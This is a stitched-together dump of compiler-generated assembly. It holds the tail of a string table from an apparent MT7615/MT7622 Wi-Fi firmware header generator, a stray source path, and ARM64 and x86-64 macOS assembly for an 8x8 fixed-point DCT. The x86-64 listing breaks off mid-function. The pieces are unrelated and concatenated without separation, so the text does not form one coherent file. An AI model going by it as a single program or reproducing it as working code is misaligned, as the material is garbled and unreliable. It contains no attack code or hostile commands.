L_.str.21: ## @.str.21 .asciz "Environment value \"CHIPSET\" not export\n" L_.str.22: ## @.str.22 .asciz "Build %s %s\n" L_.str.23: ## @.str.23 .asciz "Environment value \"HAS_FPGA_MODE\" not export\n" L_.str.24: ## @.str.24 .asciz "Environment value \"HAS_FPGA_MODE\" is too long, need less than 20\n" L_.str.25: ## @.str.25 .asciz "Environment value \"HAS_RX_CUT_THROUGH\" not export\n" L_.str.26: ## @.str.26 .asciz "Environment value \"HAS_RX_CUT_THROUGH\" is too long, need less than 20\n" L_.str.27: ## @.str.27 .asciz "Environment value \"RT28xx_DIR\" is too long!\n" L_.str.28: ## @.str.28 .asciz "Environment value \"RT28xx_BIN_DIR\" is too long!\n" L_.str.29: ## @.str.29 .asciz "chipset = %s\n" L_.str.30: ## @.str.30 .asciz "/bin/" L_.str.31: ## @.str.31 .asciz "/embedded/include/mcu/" L_.str.32: ## @.str.32 .asciz "/embedded/include/eeprom/" L_.str.33: ## @.str.33 .asciz "/" L_.str.34: ## @.str.34 .asciz "mt7615" L_.str.35: ## @.str.35 .asciz "mt7615_patch_e1_hdr.bin" L_.str.36: ## @.str.36 .asciz "mt7615_rom_patch_e1.h" L_.str.37: ## @.str.37 .asciz "mt7615_rom_patch_e1" L_.str.38: ## @.str.38 .asciz "mt7615_patch_e3_hdr.bin" L_.str.39: ## @.str.39 .asciz "mt7615_rom_patch.h" L_.str.40: ## @.str.40 .asciz "mt7615_rom_patch" L_.str.41: ## @.str.41 .asciz "y" L_.str.42: ## @.str.42 .asciz "WIFI_RAM_CODE_MT7615_FPGA.bin" L_.str.43: ## @.str.43 .asciz "WIFI_RAM_CODE_MT7615_E1.bin" L_.str.44: ## @.str.44 .asciz "WIFI_RAM_CODE_MT7615.bin" L_.str.45: ## @.str.45 .asciz "mt7615_firmware.h" L_.str.46: ## @.str.46 .asciz "MT7615_FirmwareImage" L_.str.47: ## @.str.47 .asciz "mt7615_firmware_e1.h" L_.str.48: ## @.str.48 .asciz "MT7615_FirmwareImage_E1" L_.str.49: ## @.str.49 .asciz "MT7615_cr4.bin" L_.str.50: ## @.str.50 .asciz "MT7615_cr4_noReOrdering.bin" L_.str.51: ## @.str.51 .asciz "mt7615_cr4_firmware.h" L_.str.52: ## @.str.52 .asciz "MT7615_CR4_FirmwareImage" L_.str.53: ## @.str.53 .asciz "MT7615_E2PImage1_iPAiLNA" L_.str.54: ## @.str.54 .asciz "MT7615_E2PImage2_iPAiLNA" L_.str.55: ## @.str.55 .asciz "MT7615_E2PImage3_iPAiLNA" L_.str.56: ## @.str.56 .asciz "iPAiLNA/MT7615_EEPROM1.bin" L_.str.57: ## @.str.57 .asciz "iPAiLNA/MT7615_EEPROM2.bin" L_.str.58: ## @.str.58 .asciz "iPAiLNA/MT7615_EEPROM3.bin" L_.str.59: ## @.str.59 .asciz "mt7615_e2p_iPAiLNA.h" L_.str.60: ## @.str.60 .asciz "w" L_.str.61: ## @.str.61 .asciz "a" L_.str.62: ## @.str.62 .asciz "MT7615_E2PImage1_iPAeLNA" L_.str.63: ## @.str.63 .asciz "MT7615_E2PImage2_iPAeLNA" L_.str.64: ## @.str.64 .asciz "MT7615_E2PImage3_iPAeLNA" L_.str.65: ## @.str.65 .asciz "iPAeLNA/MT7615_EEPROM1.bin" L_.str.66: ## @.str.66 .asciz "iPAeLNA/MT7615_EEPROM2.bin" L_.str.67: ## @.str.67 .asciz "iPAeLNA/MT7615_EEPROM3.bin" L_.str.68: ## @.str.68 .asciz "mt7615_e2p_iPAeLNA.h" L_.str.69: ## @.str.69 .asciz "MT7615_E2PImage1_ePAeLNA" L_.str.70: ## @.str.70 .asciz "MT7615_E2PImage2_ePAeLNA" L_.str.71: ## @.str.71 .asciz "MT7615_E2PImage3_ePAeLNA" L_.str.72: ## @.str.72 .asciz "ePAeLNA/MT7615_EEPROM1.bin" L_.str.73: ## @.str.73 .asciz "ePAeLNA/MT7615_EEPROM2.bin" L_.str.74: ## @.str.74 .asciz "ePAeLNA/MT7615_EEPROM3.bin" L_.str.75: ## @.str.75 .asciz "mt7615_e2p_ePAeLNA.h" L_.str.76: ## @.str.76 .asciz "MT7615_E2PImage1_ePAiLNA" L_.str.77: ## @.str.77 .asciz "MT7615_E2PImage2_ePAiLNA" L_.str.78: ## @.str.78 .asciz "MT7615_E2PImage3_ePAiLNA" L_.str.79: ## @.str.79 .asciz "ePAiLNA/MT7615_EEPROM1.bin" L_.str.80: ## @.str.80 .asciz "ePAiLNA/MT7615_EEPROM2.bin" L_.str.81: ## @.str.81 .asciz "ePAiLNA/MT7615_EEPROM3.bin" L_.str.82: ## @.str.82 .asciz "mt7615_e2p_ePAiLNA.h" L_.str.83: ## @.str.83 .asciz "mt7622" L_.str.84: ## @.str.84 .asciz "mt7622_patch_e1_hdr.bin" L_.str.85: ## @.str.85 .asciz "mt7622_rom_patch_e1.h" L_.str.86: ## @.str.86 .asciz "mt7622_rom_patch_e1" L_.str.87: ## @.str.87 .asciz "mt7622_patch_e2_hdr.bin" L_.str.88: ## @.str.88 .asciz "mt7622_rom_patch_e2.h" L_.str.89: ## @.str.89 .asciz "mt7622_rom_patch_e2" L_.str.90: ## @.str.90 .asciz "WIFI_RAM_CODE_MT7622_FPGA.bin" L_.str.91: ## @.str.91 .asciz "WIFI_RAM_CODE_MT7622.bin" L_.str.92: ## @.str.92 .asciz "WIFI_RAM_CODE_MT7622_E2.bin" L_.str.93: ## @.str.93 .asciz "mt7622_firmware.h" L_.str.94: ## @.str.94 .asciz "mt7622_firmware_e2.h" L_.str.95: ## @.str.95 .asciz "MT7622_FirmwareImage_E1" L_.str.96: ## @.str.96 .asciz "MT7622_FirmwareImage_E2" L_.str.97: ## @.str.97 .asciz "MT7622_E2PImage_iPAiLNA" L_.str.98: ## @.str.98 .asciz "iPAiLNA/MT7622_EEPROM.bin" L_.str.99: ## @.str.99 .asciz "mt7622_e2p_iPAiLNA.h" L_.str.100: ## @.str.100 .asciz "MT7622_E2PImage_iPAeLNA" L_.str.101: ## @.str.101 .asciz "iPAeLNA/MT7622_EEPROM.bin" L_.str.102: ## @.str.102 .asciz "mt7622_e2p_iPAeLNA.h" L_.str.103: ## @.str.103 .asciz "MT7622_E2PImage_ePAeLNA" L_.str.104: ## @.str.104 .asciz "ePAeLNA/MT7622_EEPROM.bin" L_.str.105: ## @.str.105 .asciz "mt7622_e2p_ePAeLNA.h" L_.str.106: ## @.str.106 .asciz "unknown chipset = %s\n" .subsections_via_symbols
the_stack_data/415778.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _dct_1d ; -- Begin function dct_1d .p2align 2 _dct_1d: ; @dct_1d .cfi_startproc ; %bb.0: sub sp, sp, #208 .cfi_def_cfa_offset 208 stp x29, x30, [sp, #192] ; 16-byte Folded Spill add x29, sp, #192 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str x0, [sp, #48] str x1, [sp, #40] ldr x0, [sp, #40] mov w1, #8 str w1, [sp, #12] ; 4-byte Folded Spill bl __ssdm_SpecArrayDimSize ldr w1, [sp, #12] ; 4-byte Folded Reload ldr x0, [sp, #48] bl __ssdm_SpecArrayDimSize add x0, sp, #56 str x0, [sp, #16] ; 8-byte Folded Spill adrp x1, l___const.dct_1d.dct_coeff_table@PAGE add x1, x1, l___const.dct_1d.dct_coeff_table@PAGEOFF mov x2, #128 bl _memcpy ldr x0, [sp, #16] ; 8-byte Folded Reload bl __ssdm_SpecConstant b LBB0_1 LBB0_1: str wzr, [sp, #36] b LBB0_2 LBB0_2: ; =>This Loop Header: Depth=1 ; Child Loop BB0_5 Depth 2 ldr w8, [sp, #36] subs w8, w8, #8 cset w8, hs tbnz w8, #0, LBB0_10 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_2 Depth=1 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_2 Depth=1 str wzr, [sp, #32] str wzr, [sp, #28] b LBB0_5 LBB0_5: ; Parent Loop BB0_2 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #32] subs w8, w8, #8 cset w8, hs tbnz w8, #0, LBB0_8 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=2 ldr w8, [sp, #36] mov x9, x8 add x8, sp, #56 add x8, x8, x9, lsl #4 ldr w9, [sp, #32] ; kill: def $x9 killed $w9 ldrsh w8, [x8, x9, lsl #1] str w8, [sp, #24] ldr x8, [sp, #48] ldr w9, [sp, #32] ; kill: def $x9 killed $w9 ldrsh w8, [x8, x9, lsl #1] ldr w9, [sp, #24] mul w9, w8, w9 ldr w8, [sp, #28] add w8, w8, w9 str w8, [sp, #28] b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=2 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB0_5 LBB0_8: ; in Loop: Header=BB0_2 Depth=1 ldr w8, [sp, #28] add w8, w8, #1, lsl #12 ; =4096 asr w8, w8, #13 ldr x9, [sp, #40] ldr w10, [sp, #36] ; kill: def $x10 killed $w10 strh w8, [x9, x10, lsl #1] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_2 Depth=1 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB0_2 LBB0_10: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_12 b LBB0_11 LBB0_11: bl ___stack_chk_fail LBB0_12: ldp x29, x30, [sp, #192] ; 16-byte Folded Reload add sp, sp, #208 ret .cfi_endproc ; -- End function .globl _dct_2d ; -- Begin function dct_2d .p2align 2 _dct_2d: ; @dct_2d .cfi_startproc ; %bb.0: sub sp, sp, #464 .cfi_def_cfa_offset 464 stp x28, x27, [sp, #432] ; 16-byte Folded Spill stp x29, x30, [sp, #448] ; 16-byte Folded Spill add x29, sp, #448 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str x0, [sp, #32] str x1, [sp, #24] ldr x0, [sp, #24] mov w1, #8 str w1, [sp, #12] ; 4-byte Folded Spill bl __ssdm_SpecArrayDimSize ldr w1, [sp, #12] ; 4-byte Folded Reload ldr x0, [sp, #32] bl __ssdm_SpecArrayDimSize b LBB1_1 LBB1_1: str wzr, [sp, #20] b LBB1_2 LBB1_2: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #8 cset w8, hs tbnz w8, #0, LBB1_5 b LBB1_3 LBB1_3: ; in Loop: Header=BB1_2 Depth=1 ldr x8, [sp, #32] ldr w9, [sp, #20] ; kill: def $x9 killed $w9 add x0, x8, x9, lsl #4 ldr w8, [sp, #20] mov x9, x8 sub x8, x29, #152 add x1, x8, x9, lsl #4 bl _dct_1d b LBB1_4 LBB1_4: ; in Loop: Header=BB1_2 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB1_2 LBB1_5: b LBB1_6 LBB1_6: str wzr, [sp, #16] b LBB1_7 LBB1_7: ; =>This Loop Header: Depth=1 ; Child Loop BB1_10 Depth 2 ldr w8, [sp, #16] subs w8, w8, #8 cset w8, hs tbnz w8, #0, LBB1_15 b LBB1_8 LBB1_8: ; in Loop: Header=BB1_7 Depth=1 b LBB1_9 LBB1_9: ; in Loop: Header=BB1_7 Depth=1 str wzr, [sp, #20] b LBB1_10 LBB1_10: ; Parent Loop BB1_7 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #20] subs w8, w8, #8 cset w8, hs tbnz w8, #0, LBB1_13 b LBB1_11 LBB1_11: ; in Loop: Header=BB1_10 Depth=2 ldr w8, [sp, #20] mov x9, x8 sub x8, x29, #152 add x8, x8, x9, lsl #4 ldr w9, [sp, #16] ; kill: def $x9 killed $w9 add x8, x8, x9, lsl #1 ldrh w8, [x8] ldr w9, [sp, #16] mov x10, x9 add x9, sp, #40 add x9, x9, x10, lsl #4 ldr w10, [sp, #20] ; kill: def $x10 killed $w10 add x9, x9, x10, lsl #1 strh w8, [x9] b LBB1_12 LBB1_12: ; in Loop: Header=BB1_10 Depth=2 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB1_10 LBB1_13: ; in Loop: Header=BB1_7 Depth=1 b LBB1_14 LBB1_14: ; in Loop: Header=BB1_7 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB1_7 LBB1_15: b LBB1_16 LBB1_16: str wzr, [sp, #20] b LBB1_17 LBB1_17: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #8 cset w8, hs tbnz w8, #0, LBB1_20 b LBB1_18 LBB1_18: ; in Loop: Header=BB1_17 Depth=1 ldr w8, [sp, #20] mov x9, x8 add x8, sp, #40 add x0, x8, x9, lsl #4 ldr w8, [sp, #20] mov x9, x8 add x8, sp, #168 add x1, x8, x9, lsl #4 bl _dct_1d b LBB1_19 LBB1_19: ; in Loop: Header=BB1_17 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB1_17 LBB1_20: b LBB1_21 LBB1_21: str wzr, [sp, #16] b LBB1_22 LBB1_22: ; =>This Loop Header: Depth=1 ; Child Loop BB1_25 Depth 2 ldr w8, [sp, #16] subs w8, w8, #8 cset w8, hs tbnz w8, #0, LBB1_30 b LBB1_23 LBB1_23: ; in Loop: Header=BB1_22 Depth=1 b LBB1_24 LBB1_24: ; in Loop: Header=BB1_22 Depth=1 str wzr, [sp, #20] b LBB1_25 LBB1_25: ; Parent Loop BB1_22 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #20] subs w8, w8, #8 cset w8, hs tbnz w8, #0, LBB1_28 b LBB1_26 LBB1_26: ; in Loop: Header=BB1_25 Depth=2 ldr w8, [sp, #20] mov x9, x8 add x8, sp, #168 add x8, x8, x9, lsl #4 ldr w9, [sp, #16] ; kill: def $x9 killed $w9 add x8, x8, x9, lsl #1 ldrh w8, [x8] ldr x9, [sp, #24] ldr w10, [sp, #16] ; kill: def $x10 killed $w10 add x9, x9, x10, lsl #4 ldr w10, [sp, #20] ; kill: def $x10 killed $w10 add x9, x9, x10, lsl #1 strh w8, [x9] b LBB1_27 LBB1_27: ; in Loop: Header=BB1_25 Depth=2 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB1_25 LBB1_28: ; in Loop: Header=BB1_22 Depth=1 b LBB1_29 LBB1_29: ; in Loop: Header=BB1_22 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB1_22 LBB1_30: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_32 b LBB1_31 LBB1_31: bl ___stack_chk_fail LBB1_32: ldp x29, x30, [sp, #448] ; 16-byte Folded Reload ldp x28, x27, [sp, #432] ; 16-byte Folded Reload add sp, sp, #464 ret .cfi_endproc ; -- End function .globl _read_data ; -- Begin function read_data .p2align 2 _read_data: ; @read_data .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] ldur x0, [x29, #-8] mov w1, #64 bl __ssdm_SpecArrayDimSize ldr x0, [sp, #16] mov w1, #8 bl __ssdm_SpecArrayDimSize b LBB2_1 LBB2_1: str wzr, [sp, #12] b LBB2_2 LBB2_2: ; =>This Loop Header: Depth=1 ; Child Loop BB2_5 Depth 2 ldr w8, [sp, #12] subs w8, w8, #8 cset w8, ge tbnz w8, #0, LBB2_10 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_2 Depth=1 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_2 Depth=1 str wzr, [sp, #8] b LBB2_5 LBB2_5: ; Parent Loop BB2_2 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #8] subs w8, w8, #8 cset w8, ge tbnz w8, #0, LBB2_8 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_5 Depth=2 ldur x8, [x29, #-8] ldr w10, [sp, #12] ldr w9, [sp, #8] add w9, w9, w10, lsl #3 add x8, x8, w9, sxtw #1 ldrh w8, [x8] ldr x9, [sp, #16] ldrsw x10, [sp, #12] add x9, x9, x10, lsl #4 ldrsw x10, [sp, #8] add x9, x9, x10, lsl #1 strh w8, [x9] b LBB2_7 LBB2_7: ; in Loop: Header=BB2_5 Depth=2 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB2_5 LBB2_8: ; in Loop: Header=BB2_2 Depth=1 b LBB2_9 LBB2_9: ; in Loop: Header=BB2_2 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB2_2 LBB2_10: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _write_data ; -- Begin function write_data .p2align 2 _write_data: ; @write_data .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] ldr x0, [sp, #16] mov w1, #64 bl __ssdm_SpecArrayDimSize ldur x0, [x29, #-8] mov w1, #8 bl __ssdm_SpecArrayDimSize b LBB3_1 LBB3_1: str wzr, [sp, #12] b LBB3_2 LBB3_2: ; =>This Loop Header: Depth=1 ; Child Loop BB3_5 Depth 2 ldr w8, [sp, #12] subs w8, w8, #8 cset w8, ge tbnz w8, #0, LBB3_10 b LBB3_3 LBB3_3: ; in Loop: Header=BB3_2 Depth=1 b LBB3_4 LBB3_4: ; in Loop: Header=BB3_2 Depth=1 str wzr, [sp, #8] b LBB3_5 LBB3_5: ; Parent Loop BB3_2 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #8] subs w8, w8, #8 cset w8, ge tbnz w8, #0, LBB3_8 b LBB3_6 LBB3_6: ; in Loop: Header=BB3_5 Depth=2 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] add x8, x8, x9, lsl #4 ldrsw x9, [sp, #8] add x8, x8, x9, lsl #1 ldrh w8, [x8] ldr x9, [sp, #16] ldr w11, [sp, #12] ldr w10, [sp, #8] add w10, w10, w11, lsl #3 add x9, x9, w10, sxtw #1 strh w8, [x9] b LBB3_7 LBB3_7: ; in Loop: Header=BB3_5 Depth=2 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB3_5 LBB3_8: ; in Loop: Header=BB3_2 Depth=1 b LBB3_9 LBB3_9: ; in Loop: Header=BB3_2 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB3_2 LBB3_10: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _dct ; -- Begin function dct .p2align 2 _dct: ; @dct .cfi_startproc ; %bb.0: sub sp, sp, #336 .cfi_def_cfa_offset 336 stp x28, x27, [sp, #304] ; 16-byte Folded Spill stp x29, x30, [sp, #320] ; 16-byte Folded Spill add x29, sp, #320 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str x0, [sp, #32] str x1, [sp, #24] ldr x0, [sp, #24] mov w1, #64 str w1, [sp, #4] ; 4-byte Folded Spill bl __ssdm_SpecArrayDimSize ldr w1, [sp, #4] ; 4-byte Folded Reload ldr x0, [sp, #32] bl __ssdm_SpecArrayDimSize ldr x0, [sp, #32] sub x1, x29, #152 str x1, [sp, #8] ; 8-byte Folded Spill bl _read_data ldr x0, [sp, #8] ; 8-byte Folded Reload add x1, sp, #40 str x1, [sp, #16] ; 8-byte Folded Spill bl _dct_2d ldr x0, [sp, #16] ; 8-byte Folded Reload ldr x1, [sp, #24] bl _write_data ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: bl ___stack_chk_fail LBB4_2: ldp x29, x30, [sp, #320] ; 16-byte Folded Reload ldp x28, x27, [sp, #304] ; 16-byte Folded Reload add sp, sp, #336 ret .cfi_endproc ; -- End function .section __TEXT,__const .p2align 1 ; @__const.dct_1d.dct_coeff_table l___const.dct_1d.dct_coeff_table: .short 8192 ; 0x2000 .short 8192 ; 0x2000 .short 8192 ; 0x2000 .short 8192 ; 0x2000 .short 8192 ; 0x2000 .short 8192 ; 0x2000 .short 8192 ; 0x2000 .short 8192 ; 0x2000 .short 11363 ; 0x2c63 .short 9633 ; 0x25a1 .short 6436 ; 0x1924 .short 2260 ; 0x8d4 .short 63276 ; 0xf72c .short 59100 ; 0xe6dc .short 55904 ; 0xda60 .short 54174 ; 0xd39e .short 10703 ; 0x29cf .short 4433 ; 0x1151 .short 61103 ; 0xeeaf .short 54833 ; 0xd631 .short 54833 ; 0xd631 .short 61103 ; 0xeeaf .short 4433 ; 0x1151 .short 10703 ; 0x29cf .short 9633 ; 0x25a1 .short 63276 ; 0xf72c .short 54174 ; 0xd39e .short 59100 ; 0xe6dc .short 6436 ; 0x1924 .short 11363 ; 0x2c63 .short 2260 ; 0x8d4 .short 55904 ; 0xda60 .short 8192 ; 0x2000 .short 57344 ; 0xe000 .short 57344 ; 0xe000 .short 8192 ; 0x2000 .short 8192 ; 0x2000 .short 57345 ; 0xe001 .short 57345 ; 0xe001 .short 8192 ; 0x2000 .short 6436 ; 0x1924 .short 54174 ; 0xd39e .short 2260 ; 0x8d4 .short 9633 ; 0x25a1 .short 55904 ; 0xda60 .short 63276 ; 0xf72c .short 11363 ; 0x2c63 .short 59100 ; 0xe6dc .short 4433 ; 0x1151 .short 54833 ; 0xd631 .short 10703 ; 0x29cf .short 61103 ; 0xeeaf .short 61103 ; 0xeeaf .short 10703 ; 0x29cf .short 54833 ; 0xd631 .short 4433 ; 0x1151 .short 2260 ; 0x8d4 .short 59100 ; 0xe6dc .short 9633 ; 0x25a1 .short 54174 ; 0xd39e .short 11363 ; 0x2c63 .short 55904 ; 0xda60 .short 6436 ; 0x1924 .short 63276 ; 0xf72c .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _dct_1d ## -- Begin function dct_1d .p2align 4, 0x90 _dct_1d: ## @dct_1d .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $176, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -152(%rbp) movq %rsi, -160(%rbp) movq -160(%rbp), %rdi movl $8, %esi movb $0, %al callq __ssdm_SpecArrayDimSize movq -152(%rbp), %rdi movl $8, %esi movb $0, %al callq __ssdm_SpecArrayDimSize leaq -144(%rbp), %rdi leaq l___const.dct_1d.dct_coeff_table(%rip), %rsi movl $128, %edx callq _memcpy leaq -144(%rbp), %rdi movb $0, %al callq __ssdm_SpecConstant ## %bb.1: movl $0, -164(%rbp) LBB0_2: ## =>This Loop Header: Depth=1 ## Child Loop BB0_5 Depth 2 cmpl $8, -164(%rbp) jae LBB0_10 ## %bb.3: ## in Loop: Header=BB0_2 Depth=1 jmp LBB0_4 LBB0_4: ## in Loop: Header=BB0_2 Depth=1 movl $0, -168(%rbp) movl $0, -172(%rbp) LBB0_5: ## Parent Loop BB0_2 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $8, -168(%rbp) jae LBB0_8 ## %bb.6: ## in Loop: Header=BB0_5 Depth=2 movl -164(%rbp), %eax movl %eax, %ecx leaq -144(%rbp), %rax shlq $4, %rcx addq %rcx, %rax movl -168(%rbp), %ecx ## kill: def $rcx killed $ecx movswl (%rax,%rcx,2), %eax movl %eax, -176(%rbp) movq -152(%rbp), %rax movl -168(%rbp), %ecx ## kill: def $rcx killed $ecx movswl (%rax,%rcx,2), %eax imull -176(%rbp), %eax addl -172(%rbp), %eax movl %eax, -172(%rbp) ## %bb.7: ## in Loop: Header=BB0_5 Depth=2 movl -168(%rbp), %eax addl $1, %eax movl %eax, -168(%rbp) jmp LBB0_5 LBB0_8: ## in Loop: Header=BB0_2 Depth=1 movl -172(%rbp), %eax addl $4096, %eax ## imm = 0x1000 sarl $13, %eax movw %ax, %dx movq -160(%rbp), %rax movl -164(%rbp), %ecx ## kill: def $rcx killed $ecx movw %dx, (%rax,%rcx,2) ## %bb.9: ## in Loop: Header=BB0_2 Depth=1 movl -164(%rbp), %eax addl $1, %eax movl %eax, -164(%rbp) jmp LBB0_2 LBB0_10: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_12 ## %bb.11: addq $176, %rsp popq %rbp retq LBB0_12: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _dct_2d ## -- Begin function dct_2d .p2align 4, 0x90 _dct_2d: ## @dct_2d .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $432, %rsp ## imm = 0x1B0 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -408(%rbp) movq %rsi, -416(%rbp) movq -416(%rbp), %rdi movl $8, %esi movb $0, %al callq __ssdm_SpecArrayDimSize movq -408(%rbp), %rdi movl $8, %esi movb $0, %al callq __ssdm_SpecArrayDimSize ## %bb.1: movl $0, -420(%rbp) LBB1_2: ## =>This Inner Loop Header: Depth=1 cmpl $8, -420(%rbp) jae LBB1_5 ## %bb.3: ## in Loop: Header=BB1_2 Depth=1 movq -408(%rbp), %rdi movl -420(%rbp), %eax ## kill: def $rax killed $eax shlq $4, %rax addq %rax, %rdi movl -420(%rbp), %eax ## kill: def $rax killed $eax leaq -144(%rbp), %rsi shlq $4, %rax addq %rax, %rsi callq _dct_1d ## %bb.4: ## in Loop: Header=BB1_2 Depth=1 movl -420(%rbp), %eax addl $1, %eax movl %eax, -420(%rbp) jmp LBB1_2 LBB1_5: jmp LBB1_6 LBB1_6: movl $0, -424(%rbp) LBB1_7: ## =>This Loop Header: Depth=1 ## Child Loop BB1_10 Depth 2 cmpl $8, -424(%rbp) jae LBB1_15 ## %bb.8: ## in Loop: Header=BB1_7 Depth=1 jmp LBB1_9 LBB1_9: ## in Loop: Header=BB1_7 Depth=1 movl $0, -420(%rbp) LBB1_10: ## Parent Loop BB1_7 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $8, -420(%rbp) jae LBB1_13 ## %bb.11: ## in Loop: Header=BB1_10 Depth=2 movl -420(%rbp), %eax movl %eax, %ecx leaq -144(%rbp), %rax shlq $4, %rcx addq %rcx, %rax movl -424(%rbp), %ecx ## kill: def $rcx killed $ecx movw (%rax,%rcx,2), %dx movl -424(%rbp), %eax movl %eax, %ecx leaq -400(%rbp), %rax shlq $4, %rcx addq %rcx, %rax movl -420(%rbp), %ecx ## kill: def $rcx killed $ecx movw %dx, (%rax,%rcx,2) ## %bb.12: ## in Loop: Header=BB1_10 Depth=2 movl -420(%rbp), %eax addl $1, %eax movl %eax, -420(%rbp) jmp LBB1_10 LBB1_13: ## in Loop: Header=BB1_7 Depth=1 jmp LBB1_14 LBB1_14: ## in Loop: Header=BB1_7 Depth=1 movl -424(%rbp), %eax addl $1, %eax movl %eax, -424(%rbp) jmp LBB1_7 LBB1_15: jmp LBB1_16 LBB1_16: movl $0, -420(%rbp) LBB1_17: ## =>This Inner Loop Header: Depth=1 cmpl $8, -420(%rbp) jae LBB1_20 ## %bb.18: ## in Loop: Header=BB1_17 Depth=1 movl -420(%rbp), %eax ## kill: def $rax killed $eax leaq -400(%rbp), %rdi shlq $4, %rax addq %rax, %rdi movl -420(%rbp), %eax ## kill: def $rax killed $eax leaq -272(%rbp), %rsi shlq $4, %rax addq %rax, %rsi callq _dct_1d ## %bb.19: ## in Loop: Header=BB1_17 Depth=1 movl -420(%rbp), %eax addl $1, %eax movl %eax, -420(%rbp) jmp LBB1_17 LBB1_20: jmp LBB1_21 LBB1_21: movl $0, -424(%rbp) LBB1_22: ## =>This Loop Header: Depth=1 ## Child Loop BB1_25 Depth 2 cmpl $8, -424(%rbp) jae LBB1_30 ## %bb.23: ## in Loop: Header=BB1_22 Depth=1 jmp LBB1_24 LBB1_24: ## in Loop: Header=BB1_22 Depth=1 movl $0, -420(%rbp) LBB1_25: ## Parent Loop BB1_22 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $8, -420(%rbp) jae LBB1_28 ## 